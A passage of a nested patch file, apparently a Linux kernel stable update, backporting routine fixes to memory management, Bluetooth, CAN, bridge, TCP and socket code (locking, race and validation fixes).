+ 	 * These loops must be protected from rethook_free_rcu() because those
+ 	 * are accessing 'rhn->rethook'.
+ 	 */
+-	preempt_disable();
++	preempt_disable_notrace();
+ 
+ 	/*
+ 	 * Run the handler on the shadow stack. Do not unlink the list here because
+@@ -321,7 +321,7 @@ unsigned long rethook_trampoline_handler(struct pt_regs *regs,
+ 		first = first->next;
+ 		rethook_recycle(rhn);
+ 	}
+-	preempt_enable();
++	preempt_enable_notrace();
+ 
+ 	return correct_ret_addr;
+ }
+diff --git a/lib/cpu_rmap.c b/lib/cpu_rmap.c
+index f08d9c56f712e..e77f12bb3c774 100644
+--- a/lib/cpu_rmap.c
++++ b/lib/cpu_rmap.c
+@@ -232,7 +232,8 @@ void free_irq_cpu_rmap(struct cpu_rmap *rmap)
+ 
+ 	for (index = 0; index < rmap->used; index++) {
+ 		glue = rmap->obj[index];
+-		irq_set_affinity_notifier(glue->notify.irq, NULL);
++		if (glue)
++			irq_set_affinity_notifier(glue->notify.irq, NULL);
+ 	}
+ 
+ 	cpu_rmap_put(rmap);
+@@ -268,6 +269,7 @@ static void irq_cpu_rmap_release(struct kref *ref)
+ 		container_of(ref, struct irq_glue, notify.kref);
+ 
+ 	cpu_rmap_put(glue->rmap);
++	glue->rmap->obj[glue->index] = NULL;
+ 	kfree(glue);
+ }
+ 
+@@ -297,6 +299,7 @@ int irq_cpu_rmap_add(struct cpu_rmap *rmap, int irq)
+ 	rc = irq_set_affinity_notifier(irq, &glue->notify);
+ 	if (rc) {
+ 		cpu_rmap_put(glue->rmap);
++		rmap->obj[glue->index] = NULL;
+ 		kfree(glue);
+ 	}
+ 	return rc;
+diff --git a/lib/dim/dim.c b/lib/dim/dim.c
+index 38045d6d05381..e89aaf07bde50 100644
+--- a/lib/dim/dim.c
++++ b/lib/dim/dim.c
+@@ -54,7 +54,7 @@ void dim_park_tired(struct dim *dim)
+ }
+ EXPORT_SYMBOL(dim_park_tired);
+ 
+-void dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
++bool dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
+ 		    struct dim_stats *curr_stats)
+ {
+ 	/* u32 holds up to 71 minutes, should be enough */
+@@ -66,7 +66,7 @@ void dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
+ 			     start->comp_ctr);
+ 
+ 	if (!delta_us)
+-		return;
++		return false;
+ 
+ 	curr_stats->ppms = DIV_ROUND_UP(npkts * USEC_PER_MSEC, delta_us);
+ 	curr_stats->bpms = DIV_ROUND_UP(nbytes * USEC_PER_MSEC, delta_us);
+@@ -79,5 +79,6 @@ void dim_calc_stats(struct dim_sample *start, struct dim_sample *end,
+ 	else
+ 		curr_stats->cpe_ratio = 0;
+ 
++	return true;
+ }
+ EXPORT_SYMBOL(dim_calc_stats);
+diff --git a/lib/dim/net_dim.c b/lib/dim/net_dim.c
+index 53f6b9c6e9366..4e32f7aaac86c 100644
+--- a/lib/dim/net_dim.c
++++ b/lib/dim/net_dim.c
+@@ -227,7 +227,8 @@ void net_dim(struct dim *dim, struct dim_sample end_sample)
+ 				  dim->start_sample.event_ctr);
+ 		if (nevents < DIM_NEVENTS)
+ 			break;
+-		dim_calc_stats(&dim->start_sample, &end_sample, &curr_stats);
++		if (!dim_calc_stats(&dim->start_sample, &end_sample, &curr_stats))
++			break;
+ 		if (net_dim_decision(&curr_stats, dim)) {
+ 			dim->state = DIM_APPLY_NEW_PROFILE;
+ 			schedule_work(&dim->work);
+diff --git a/lib/dim/rdma_dim.c b/lib/dim/rdma_dim.c
+index 15462d54758d3..88f7794867078 100644
+--- a/lib/dim/rdma_dim.c
++++ b/lib/dim/rdma_dim.c
+@@ -88,7 +88,8 @@ void rdma_dim(struct dim *dim, u64 completions)
+ 		nevents = curr_sample->event_ctr - dim->start_sample.event_ctr;
+ 		if (nevents < DIM_NEVENTS)
+ 			break;
+-		dim_calc_stats(&dim->start_sample, curr_sample, &curr_stats);
++		if (!dim_calc_stats(&dim->start_sample, curr_sample, &curr_stats))
++			break;
+ 		if (rdma_dim_decision(&curr_stats, dim)) {
+ 			dim->state = DIM_APPLY_NEW_PROFILE;
+ 			schedule_work(&dim->work);
+diff --git a/lib/maple_tree.c b/lib/maple_tree.c
+index 9fe25ce9937b8..b72268848ade1 100644
+--- a/lib/maple_tree.c
++++ b/lib/maple_tree.c
+@@ -5338,15 +5338,9 @@ int mas_empty_area(struct ma_state *mas, unsigned long min,
+ 
+ 	mt = mte_node_type(mas->node);
+ 	pivots = ma_pivots(mas_mn(mas), mt);
+-	if (offset)
+-		mas->min = pivots[offset - 1] + 1;
+-
+-	if (offset < mt_pivots[mt])
+-		mas->max = pivots[offset];
+-
+-	if (mas->index < mas->min)
+-		mas->index = mas->min;
+-
++	min = mas_safe_min(mas, pivots, offset);
++	if (mas->index < min)
++		mas->index = min;
+ 	mas->last = mas->index + size - 1;
+ 	return 0;
+ }
+diff --git a/mm/zswap.c b/mm/zswap.c
+index 2d48fd59cc7ab..708b82dbe8a46 100644
+--- a/mm/zswap.c
++++ b/mm/zswap.c
+@@ -1002,6 +1002,22 @@ static int zswap_writeback_entry(struct zpool *pool, unsigned long handle)
+ 		goto fail;
+ 
+ 	case ZSWAP_SWAPCACHE_NEW: /* page is locked */
++		/*
++		 * Having a local reference to the zswap entry doesn't exclude
++		 * swapping from invalidating and recycling the swap slot. Once
++		 * the swapcache is secured against concurrent swapping to and
++		 * from the slot, recheck that the entry is still current before
++		 * writing.
++		 */
++		spin_lock(&tree->lock);
++		if (zswap_rb_search(&tree->rbroot, entry->offset) != entry) {
++			spin_unlock(&tree->lock);
++			delete_from_swap_cache(page_folio(page));
++			ret = -ENOMEM;
++			goto fail;
++		}
++		spin_unlock(&tree->lock);
++
+ 		/* decompress */
+ 		acomp_ctx = raw_cpu_ptr(entry->pool->acomp_ctx);
+ 		dlen = PAGE_SIZE;
+diff --git a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c
+index 07e86d03d4bae..d3e511e1eba8a 100644
+--- a/net/8021q/vlan_dev.c
++++ b/net/8021q/vlan_dev.c
+@@ -108,8 +108,8 @@ static netdev_tx_t vlan_dev_hard_start_xmit(struct sk_buff *skb,
+ 	 * NOTE: THIS ASSUMES DIX ETHERNET, SPECIFICALLY NOT SUPPORTING
+ 	 * OTHER THINGS LIKE FDDI/TokenRing/802.3 SNAPs...
+ 	 */
+-	if (veth->h_vlan_proto != vlan->vlan_proto ||
+-	    vlan->flags & VLAN_FLAG_REORDER_HDR) {
++	if (vlan->flags & VLAN_FLAG_REORDER_HDR ||
++	    veth->h_vlan_proto != vlan->vlan_proto) {
+ 		u16 vlan_tci;
+ 		vlan_tci = vlan->vlan_id;
+ 		vlan_tci |= vlan_dev_get_egress_qos_mask(dev, skb->priority);
+diff --git a/net/bluetooth/hci_event.c b/net/bluetooth/hci_event.c
+index 42a3a19b111e3..21416ccc30ab2 100644
+--- a/net/bluetooth/hci_event.c
++++ b/net/bluetooth/hci_event.c
+@@ -881,8 +881,13 @@ static u8 hci_cc_read_local_ext_features(struct hci_dev *hdev, void *data,
+ 	if (rp->status)
+ 		return rp->status;
+ 
+-	if (hdev->max_page < rp->max_page)
+-		hdev->max_page = rp->max_page;
++	if (hdev->max_page < rp->max_page) {
++		if (test_bit(HCI_QUIRK_BROKEN_LOCAL_EXT_FEATURES_PAGE_2,
++			     &hdev->quirks))
++			bt_dev_warn(hdev, "broken local ext features page 2");
++		else
++			hdev->max_page = rp->max_page;
++	}
+ 
+ 	if (rp->page < HCI_MAX_PAGES)
+ 		memcpy(hdev->features[rp->page], rp->features, 8);
+diff --git a/net/bluetooth/hci_sync.c b/net/bluetooth/hci_sync.c
+index 9361fb3685cc7..e8b78104a4071 100644
+--- a/net/bluetooth/hci_sync.c
++++ b/net/bluetooth/hci_sync.c
+@@ -4075,7 +4075,8 @@ static int hci_le_set_rpa_timeout_sync(struct hci_dev *hdev)
+ {
+ 	__le16 timeout = cpu_to_le16(hdev->rpa_timeout);
+ 
+-	if (!(hdev->commands[35] & 0x04))
++	if (!(hdev->commands[35] & 0x04) ||
++	    test_bit(HCI_QUIRK_BROKEN_SET_RPA_TIMEOUT, &hdev->quirks))
+ 		return 0;
+ 
+ 	return __hci_cmd_sync_status(hdev, HCI_OP_LE_SET_RPA_TIMEOUT,
+@@ -4515,6 +4516,9 @@ static const struct {
+ 			 "HCI Set Event Filter command not supported."),
+ 	HCI_QUIRK_BROKEN(ENHANCED_SETUP_SYNC_CONN,
+ 			 "HCI Enhanced Setup Synchronous Connection command is "
++			 "advertised, but not supported."),
++	HCI_QUIRK_BROKEN(SET_RPA_TIMEOUT,
++			 "HCI LE Set Random Private Address Timeout command is "
+ 			 "advertised, but not supported.")
+ };
+ 
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index e62dadad81b31..ee8f806534dfb 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -4694,7 +4694,6 @@ static inline int l2cap_disconnect_rsp(struct l2cap_conn *conn,
+ 
+ 	chan = l2cap_get_chan_by_scid(conn, scid);
+ 	if (!chan) {
+-		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
+diff --git a/net/bridge/br_forward.c b/net/bridge/br_forward.c
+index 02bb620d3b8da..bd54f17e3c3d8 100644
+--- a/net/bridge/br_forward.c
++++ b/net/bridge/br_forward.c
+@@ -42,7 +42,7 @@ int br_dev_queue_push_xmit(struct net *net, struct sock *sk, struct sk_buff *skb
+ 	    eth_type_vlan(skb->protocol)) {
+ 		int depth;
+ 
+-		if (!__vlan_get_protocol(skb, skb->protocol, &depth))
++		if (!vlan_get_protocol_and_depth(skb, skb->protocol, &depth))
+ 			goto drop;
+ 
+ 		skb_set_network_header(skb, depth);
+diff --git a/net/bridge/br_private_tunnel.h b/net/bridge/br_private_tunnel.h
+index 2b053289f0166..efb096025151a 100644
+--- a/net/bridge/br_private_tunnel.h
++++ b/net/bridge/br_private_tunnel.h
+@@ -27,6 +27,10 @@ int br_process_vlan_tunnel_info(const struct net_bridge *br,
+ int br_get_vlan_tunnel_info_size(struct net_bridge_vlan_group *vg);
+ int br_fill_vlan_tunnel_info(struct sk_buff *skb,
+ 			     struct net_bridge_vlan_group *vg);
++bool vlan_tunid_inrange(const struct net_bridge_vlan *v_curr,
++			const struct net_bridge_vlan *v_last);
++int br_vlan_tunnel_info(const struct net_bridge_port *p, int cmd,
++			u16 vid, u32 tun_id, bool *changed);
+ 
+ #ifdef CONFIG_BRIDGE_VLAN_FILTERING
+ /* br_vlan_tunnel.c */
+@@ -43,10 +47,6 @@ void br_handle_ingress_vlan_tunnel(struct sk_buff *skb,
+ 				   struct net_bridge_vlan_group *vg);
+ int br_handle_egress_vlan_tunnel(struct sk_buff *skb,
+ 				 struct net_bridge_vlan *vlan);
+-bool vlan_tunid_inrange(const struct net_bridge_vlan *v_curr,
+-			const struct net_bridge_vlan *v_last);
+-int br_vlan_tunnel_info(const struct net_bridge_port *p, int cmd,
+-			u16 vid, u32 tun_id, bool *changed);
+ #else
+ static inline int vlan_tunnel_init(struct net_bridge_vlan_group *vg)
+ {
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 5761d4ab839dd..1af623839bffa 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -1106,7 +1106,7 @@ static int isotp_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,
+ 	struct isotp_sock *so = isotp_sk(sk);
+ 	int ret = 0;
+ 
+-	if (flags & ~(MSG_DONTWAIT | MSG_TRUNC | MSG_PEEK))
++	if (flags & ~(MSG_DONTWAIT | MSG_TRUNC | MSG_PEEK | MSG_CMSG_COMPAT))
+ 		return -EINVAL;
+ 
+ 	if (!so->bound)
+diff --git a/net/can/j1939/socket.c b/net/can/j1939/socket.c
+index b670ba03a675c..4fb3a99b5f67e 100644
+--- a/net/can/j1939/socket.c
++++ b/net/can/j1939/socket.c
+@@ -798,7 +798,7 @@ static int j1939_sk_recvmsg(struct socket *sock, struct msghdr *msg,
+ 	struct j1939_sk_buff_cb *skcb;
+ 	int ret = 0;
+ 
+-	if (flags & ~(MSG_DONTWAIT | MSG_ERRQUEUE))
++	if (flags & ~(MSG_DONTWAIT | MSG_ERRQUEUE | MSG_CMSG_COMPAT))
+ 		return -EINVAL;
+ 
+ 	if (flags & MSG_ERRQUEUE)
+diff --git a/net/core/datagram.c b/net/core/datagram.c
+index e4ff2db40c981..8dabb9a74cb17 100644
+--- a/net/core/datagram.c
++++ b/net/core/datagram.c
+@@ -799,18 +799,21 @@ __poll_t datagram_poll(struct file *file, struct socket *sock,
+ {
+ 	struct sock *sk = sock->sk;
+ 	__poll_t mask;
++	u8 shutdown;
+ 
+ 	sock_poll_wait(file, sock, wait);
+ 	mask = 0;
+ 
+ 	/* exceptional events? */
+-	if (sk->sk_err || !skb_queue_empty_lockless(&sk->sk_error_queue))
++	if (READ_ONCE(sk->sk_err) ||
++	    !skb_queue_empty_lockless(&sk->sk_error_queue))
+ 		mask |= EPOLLERR |
+ 			(sock_flag(sk, SOCK_SELECT_ERR_QUEUE) ? EPOLLPRI : 0);
+ 
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	shutdown = READ_ONCE(sk->sk_shutdown);
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLRDHUP | EPOLLIN | EPOLLRDNORM;
+-	if (sk->sk_shutdown == SHUTDOWN_MASK)
++	if (shutdown == SHUTDOWN_MASK)
+ 		mask |= EPOLLHUP;
+ 
+ 	/* readable? */
+@@ -819,10 +822,12 @@ __poll_t datagram_poll(struct file *file, struct socket *sock,
+ 
+ 	/* Connection-based need to check for termination and startup */
+ 	if (connection_based(sk)) {
+-		if (sk->sk_state == TCP_CLOSE)
++		int state = READ_ONCE(sk->sk_state);
++
++		if (state == TCP_CLOSE)
+ 			mask |= EPOLLHUP;
+ 		/* connection hasn't started yet? */
+-		if (sk->sk_state == TCP_SYN_SENT)
++		if (state == TCP_SYN_SENT)
+ 			return mask;
+ 	}
+ 
+diff --git a/net/core/dev.c b/net/core/dev.c
+index a25b8741b1599..93d430693ca0f 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -2549,6 +2549,8 @@ int __netif_set_xps_queue(struct net_device *dev, const unsigned long *mask,
+ 	struct xps_map *map, *new_map;
+ 	unsigned int nr_ids;
+ 
++	WARN_ON_ONCE(index >= dev->num_tx_queues);
++
+ 	if (dev->num_tc) {
+ 		/* Do not allow XPS on subordinate device directly */
+ 		num_tc = dev->num_tc;
+@@ -3350,7 +3352,7 @@ __be16 skb_network_protocol(struct sk_buff *skb, int *depth)
+ 		type = eth->h_proto;
+ 	}
+ 
+-	return __vlan_get_protocol(skb, type, depth);
++	return vlan_get_protocol_and_depth(skb, type, depth);
+ }
+ 
+ /* openvswitch calls this on rx path, so we need a different check.
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index ccfd9053754a9..47660002cadaf 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5053,7 +5053,7 @@ bool skb_partial_csum_set(struct sk_buff *skb, u16 start, u16 off)
+ 	u32 csum_end = (u32)start + (u32)off + sizeof(__sum16);
+ 	u32 csum_start = skb_headroom(skb) + (u32)start;
+ 
+-	if (unlikely(csum_start > U16_MAX || csum_end > skb_headlen(skb))) {
++	if (unlikely(csum_start >= U16_MAX || csum_end > skb_headlen(skb))) {
+ 		net_warn_ratelimited("bad partial csum: csum=%u/%u headroom=%u headlen=%u\n",
+ 				     start, off, skb_headroom(skb), skb_headlen(skb));
+ 		return false;
+@@ -5061,7 +5061,7 @@ bool skb_partial_csum_set(struct sk_buff *skb, u16 start, u16 off)
+ 	skb->ip_summed = CHECKSUM_PARTIAL;
+ 	skb->csum_start = csum_start;
+ 	skb->csum_offset = off;
+-	skb_set_transport_header(skb, start);
++	skb->transport_header = csum_start;
+ 	return true;
+ }
+ EXPORT_SYMBOL_GPL(skb_partial_csum_set);
+diff --git a/net/core/stream.c b/net/core/stream.c
+index cbb268c15251c..5b05b889d31af 100644
+--- a/net/core/stream.c
++++ b/net/core/stream.c
+@@ -73,8 +73,8 @@ int sk_stream_wait_connect(struct sock *sk, long *timeo_p)
+ 		add_wait_queue(sk_sleep(sk), &wait);
+ 		sk->sk_write_pending++;
+ 		done = sk_wait_event(sk, timeo_p,
+-				     !sk->sk_err &&
+-				     !((1 << sk->sk_state) &
++				     !READ_ONCE(sk->sk_err) &&
++				     !((1 << READ_ONCE(sk->sk_state)) &
+ 				       ~(TCPF_ESTABLISHED | TCPF_CLOSE_WAIT)), &wait);
+ 		remove_wait_queue(sk_sleep(sk), &wait);
+ 		sk->sk_write_pending--;
+@@ -87,9 +87,9 @@ EXPORT_SYMBOL(sk_stream_wait_connect);
+  * sk_stream_closing - Return 1 if we still have things to send in our buffers.
+  * @sk: socket to verify
+  */
+-static inline int sk_stream_closing(struct sock *sk)
++static int sk_stream_closing(const struct sock *sk)
+ {
+-	return (1 << sk->sk_state) &
++	return (1 << READ_ONCE(sk->sk_state)) &
+ 	       (TCPF_FIN_WAIT1 | TCPF_CLOSING | TCPF_LAST_ACK);
+ }
+ 
+@@ -142,8 +142,8 @@ int sk_stream_wait_memory(struct sock *sk, long *timeo_p)
+ 
+ 		set_bit(SOCK_NOSPACE, &sk->sk_socket->flags);
+ 		sk->sk_write_pending++;
+-		sk_wait_event(sk, &current_timeo, sk->sk_err ||
+-						  (sk->sk_shutdown & SEND_SHUTDOWN) ||
++		sk_wait_event(sk, &current_timeo, READ_ONCE(sk->sk_err) ||
++						  (READ_ONCE(sk->sk_shutdown) & SEND_SHUTDOWN) ||
+ 						  (sk_stream_memory_free(sk) &&
+ 						  !vm_wait), &wait);
+ 		sk->sk_write_pending--;
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index 5b19b77d5d759..5fd0ff5734e36 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -897,7 +897,7 @@ int inet_shutdown(struct socket *sock, int how)
+ 		   EPOLLHUP, even on eg. unconnected UDP sockets -- RR */
+ 		fallthrough;
+ 	default:
+-		sk->sk_shutdown |= how;
++		WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | how);
+ 		if (sk->sk_prot->shutdown)
+ 			sk->sk_prot->shutdown(sk, how);
+ 		break;
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 6667c3538f2ab..1fb67f819de49 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -498,6 +498,7 @@ __poll_t tcp_poll(struct file *file, struct socket *sock, poll_table *wait)
+ 	__poll_t mask;
+ 	struct sock *sk = sock->sk;
+ 	const struct tcp_sock *tp = tcp_sk(sk);
++	u8 shutdown;
+ 	int state;
+ 
+ 	sock_poll_wait(file, sock, wait);
+@@ -540,9 +541,10 @@ __poll_t tcp_poll(struct file *file, struct socket *sock, poll_table *wait)
+ 	 * NOTE. Check for TCP_CLOSE is added. The goal is to prevent
+ 	 * blocking on fresh not-connected or disconnected socket. --ANK
+ 	 */
+-	if (sk->sk_shutdown == SHUTDOWN_MASK || state == TCP_CLOSE)
++	shutdown = READ_ONCE(sk->sk_shutdown);
++	if (shutdown == SHUTDOWN_MASK || state == TCP_CLOSE)
+ 		mask |= EPOLLHUP;
+-	if (sk->sk_shutdown & RCV_SHUTDOWN)
++	if (shutdown & RCV_SHUTDOWN)
+ 		mask |= EPOLLIN | EPOLLRDNORM | EPOLLRDHUP;
+ 
+ 	/* Connected or passive Fast Open socket? */
+@@ -559,7 +561,7 @@ __poll_t tcp_poll(struct file *file, struct socket *sock, poll_table *wait)
+ 		if (tcp_stream_is_readable(sk, target))
+ 			mask |= EPOLLIN | EPOLLRDNORM;
+ 
+-		if (!(sk->sk_shutdown & SEND_SHUTDOWN)) {
++		if (!(shutdown & SEND_SHUTDOWN)) {
+ 			if (__sk_stream_is_writeable(sk, 1)) {
+ 				mask |= EPOLLOUT | EPOLLWRNORM;
+ 			} else {  /* send SIGIO later */
+@@ -2865,7 +2867,7 @@ void __tcp_close(struct sock *sk, long timeout)
+ 	int data_was_unread = 0;
+ 	int state;
+ 
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 
+ 	if (sk->sk_state == TCP_LISTEN) {
+ 		tcp_set_state(sk, TCP_CLOSE);
+@@ -3117,7 +3119,7 @@ int tcp_disconnect(struct sock *sk, int flags)
+ 
+ 	inet_bhash2_reset_saddr(sk);
+ 
+-	sk->sk_shutdown = 0;
++	WRITE_ONCE(sk->sk_shutdown, 0);
+ 	sock_reset_flag(sk, SOCK_DONE);
+ 	tp->srtt_us = 0;
+ 	tp->mdev_us = jiffies_to_usecs(TCP_TIMEOUT_INIT);
+@@ -4645,7 +4647,7 @@ void tcp_done(struct sock *sk)
+ 	if (req)
+ 		reqsk_fastopen_remove(sk, req, false);
+ 
+-	sk->sk_shutdown = SHUTDOWN_MASK;
++	WRITE_ONCE(sk->sk_shutdown, SHUTDOWN_MASK);
+ 
+ 	if (!sock_flag(sk, SOCK_DEAD))
+ 		sk->sk_state_change(sk);
+diff --git a/net/ipv4/tcp_bpf.c b/net/ipv4/tcp_bpf.c
+index ebf9175119370..2e9547467edbe 100644
+--- a/net/ipv4/tcp_bpf.c
++++ b/net/ipv4/tcp_bpf.c
+@@ -168,7 +168,7 @@ static int tcp_msg_wait_data(struct sock *sk, struct sk_psock *psock,
+ 	sk_set_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+ 	ret = sk_wait_event(sk, &timeo,
+ 			    !list_empty(&psock->ingress_msg) ||
+-			    !skb_queue_empty(&sk->sk_receive_queue), &wait);
++			    !skb_queue_empty_lockless(&sk->sk_receive_queue), &wait);
+ 	sk_clear_bit(SOCKWQ_ASYNC_WAITDATA, sk);
+ 	remove_wait_queue(sk_sleep(sk), &wait);
+ 	return ret;
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index 0640453fce54b..ac44edd6f52e6 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -4361,7 +4361,7 @@ void tcp_fin(struct sock *sk)
+ 
+ 	inet_csk_schedule_ack(sk);
+ 
+-	sk->sk_shutdown |= RCV_SHUTDOWN;
++	WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | RCV_SHUTDOWN);
+ 	sock_set_flag(sk, SOCK_DONE);
+ 
+ 	switch (sk->sk_state) {
+@@ -6585,7 +6585,7 @@ int tcp_rcv_state_process(struct sock *sk, struct sk_buff *skb)
+ 			break;
+ 
+ 		tcp_set_state(sk, TCP_FIN_WAIT2);
+-		sk->sk_shutdown |= SEND_SHUTDOWN;
++		WRITE_ONCE(sk->sk_shutdown, sk->sk_shutdown | SEND_SHUTDOWN);
+ 
+ 		sk_dst_confirm(sk);
+ 
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index ad0a5f185a694..b37c1bcb15097 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -829,6 +829,9 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 				   inet_twsk(sk)->tw_priority : sk->sk_priority;
+ 		transmit_time = tcp_transmit_time(sk);
+ 		xfrm_sk_clone_policy(ctl_sk, sk);
++	} else {
++		ctl_sk->sk_mark = 0;
++		ctl_sk->sk_priority = 0;
+ 	}
+ 	ip_send_unicast_reply(ctl_sk,
+ 			      skb, &TCP_SKB_CB(skb)->header.h4.opt,
+@@ -836,7 +839,6 @@ static void tcp_v4_send_reset(const struct sock *sk, struct sk_buff *skb)
+ 			      &arg, arg.iov[0].iov_len,
+ 			      transmit_time);
+ 
+-	ctl_sk->sk_mark = 0;
+ 	xfrm_sk_free_policy(ctl_sk);
+ 	sock_net_set(ctl_sk, &init_net);
+ 	__TCP_INC_STATS(net, TCP_MIB_OUTSEGS);
+@@ -935,7 +937,6 @@ static void tcp_v4_send_ack(const struct sock *sk,
+ 			      &arg, arg.iov[0].iov_len,
+ 			      transmit_time);
+ 
+-	ctl_sk->sk_mark = 0;
+ 	sock_net_set(ctl_sk, &init_net);
+ 	__TCP_INC_STATS(net, TCP_MIB_OUTSEGS);
+ 	local_bh_enable();
+diff --git a/net/ipv6/ip6_gre.c b/net/ipv6/ip6_gre.c
+index 4d5937af08ee9..216b40ccadae0 100644
+--- a/net/ipv6/ip6_gre.c
++++ b/net/ipv6/ip6_gre.c
+@@ -1037,12 +1037,14 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 					    ntohl(tun_id),
+ 					    ntohl(md->u.index), truncate,
+ 					    false);
++			proto = htons(ETH_P_ERSPAN);
+ 		} else if (md->version == 2) {
+ 			erspan_build_header_v2(skb,
+ 					       ntohl(tun_id),
+ 					       md->u.md2.dir,
+ 					       get_hwid(&md->u.md2),
+ 					       truncate, false);
++			proto = htons(ETH_P_ERSPAN2);
+ 		} else {
+ 			goto tx_err;
+ 		}
+@@ -1065,24 +1067,25 @@ static netdev_tx_t ip6erspan_tunnel_xmit(struct sk_buff *skb,
+ 			break;
+ 		}
+ 
+-		if (t->parms.erspan_ver == 1)
++		if (t->parms.erspan_ver == 1) {
+ 			erspan_build_header(skb, ntohl(t->parms.o_key),
+ 					    t->parms.index,
+ 					    truncate, false);
+-		else if (t->parms.erspan_ver == 2)
++			proto = htons(ETH_P_ERSPAN);
++		} else if (t->parms.erspan_ver == 2) {
+ 			erspan_build_header_v2(skb, ntohl(t->parms.o_key),
+ 					       t->parms.dir,
+ 					       t->parms.hwid,
+ 					       truncate, false);
+-		else
++			proto = htons(ETH_P_ERSPAN2);
++		} else {
+ 			goto tx_err;
++		}
+ 
+ 		fl6.daddr = t->parms.raddr;
+ 	}
+ 
+ 	/* Push GRE header. */
+-	proto = (t->parms.erspan_ver == 1) ? htons(ETH_P_ERSPAN)
+-					   : htons(ETH_P_ERSPAN2);
+ 	gre_build_header(skb, 8, TUNNEL_SEQ, proto, 0, htonl(atomic_fetch_inc(&t->o_seqno)));
+ 
+ 	/* TooBig packet may have updated dst->dev's mtu */
+diff --git a/net/key/af_key.c b/net/key/af_key.c
+index 95edcbedf6ef2..8c21de50eadf8 100644
+--- a/net/key/af_key.c
++++ b/net/key/af_key.c
+@@ -1940,7 +1940,8 @@ static u32 gen_reqid(struct net *net)
+ }
+ 
+ static int
+-parse_ipsecrequest(struct xfrm_policy *xp, struct sadb_x_ipsecrequest *rq)
++parse_ipsecrequest(struct xfrm_policy *xp, struct sadb_x_policy *pol,
++		   struct sadb_x_ipsecrequest *rq)
+ {
+ 	struct net *net = xp_net(xp);
+ 	struct xfrm_tmpl *t = xp->xfrm_vec + xp->xfrm_nr;
+@@ -1958,9 +1959,12 @@ parse_ipsecrequest(struct xfrm_policy *xp, struct sadb_x_ipsecrequest *rq)
+ 	if ((mode = pfkey_mode_to_xfrm(rq->sadb_x_ipsecrequest_mode)) < 0)
+ 		return -EINVAL;
+ 	t->mode = mode;
+-	if (rq->sadb_x_ipsecrequest_level == IPSEC_LEVEL_USE)
++	if (rq->sadb_x_ipsecrequest_level == IPSEC_LEVEL_USE) {
++		if ((mode == XFRM_MODE_TUNNEL || mode == XFRM_MODE_BEET) &&
++		    pol->sadb_x_policy_dir == IPSEC_DIR_OUTBOUND)
++			return -EINVAL;
+ 		t->optional = 1;
+-	else if (rq->sadb_x_ipsecrequest_level == IPSEC_LEVEL_UNIQUE) {
++	} else if (rq->sadb_x_ipsecrequest_level == IPSEC_LEVEL_UNIQUE) {
+ 		t->reqid = rq->sadb_x_ipsecrequest_reqid;
+ 		if (t->reqid > IPSEC_MANUAL_REQID_MAX)
+ 			t->reqid = 0;
+@@ -2002,7 +2006,7 @@ parse_ipsecrequests(struct xfrm_policy *xp, struct sadb_x_policy *pol)
+ 		    rq->sadb_x_ipsecrequest_len < sizeof(*rq))
+ 			return -EINVAL;
+ 
+-		if ((err = parse_ipsecrequest(xp, rq)) < 0)
++		if ((err = parse_ipsecrequest(xp, pol, rq)) < 0)
+ 			return err;
+ 		len -= rq->sadb_x_ipsecrequest_len;
+ 		rq = (void*)((u8*)rq + rq->sadb_x_ipsecrequest_len);
+diff --git a/net/llc/af_llc.c b/net/llc/af_llc.c
+index da7fe94bea2eb..9ffbc667be6cf 100644
+--- a/net/llc/af_llc.c
++++ b/net/llc/af_llc.c
+@@ -583,7 +583,8 @@ static int llc_ui_wait_for_disc(struct sock *sk, long timeout)
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	while (1) {
+-		if (sk_wait_event(sk, &timeout, sk->sk_state == TCP_CLOSE, &wait))
++		if (sk_wait_event(sk, &timeout,
++				  READ_ONCE(sk->sk_state) == TCP_CLOSE, &wait))
+ 			break;
+ 		rc = -ERESTARTSYS;
+ 		if (signal_pending(current))
+@@ -603,7 +604,8 @@ static bool llc_ui_wait_for_conn(struct sock *sk, long timeout)
+ 
+ 	add_wait_queue(sk_sleep(sk), &wait);
+ 	while (1) {
+-		if (sk_wait_event(sk, &timeout, sk->sk_state != TCP_SYN_SENT, &wait))
++		if (sk_wait_event(sk, &timeout,
++				  READ_ONCE(sk->sk_state) != TCP_SYN_SENT, &wait))
+ 			break;
+ 		if (signal_pending(current) || !timeout)
+ 			break;
+@@ -622,7 +624,7 @@ static int llc_ui_wait_for_busy_core(struct sock *sk, long timeout)
+ 	while (1) {
+ 		rc = 0;
+ 		if (sk_wait_event(sk, &timeout,
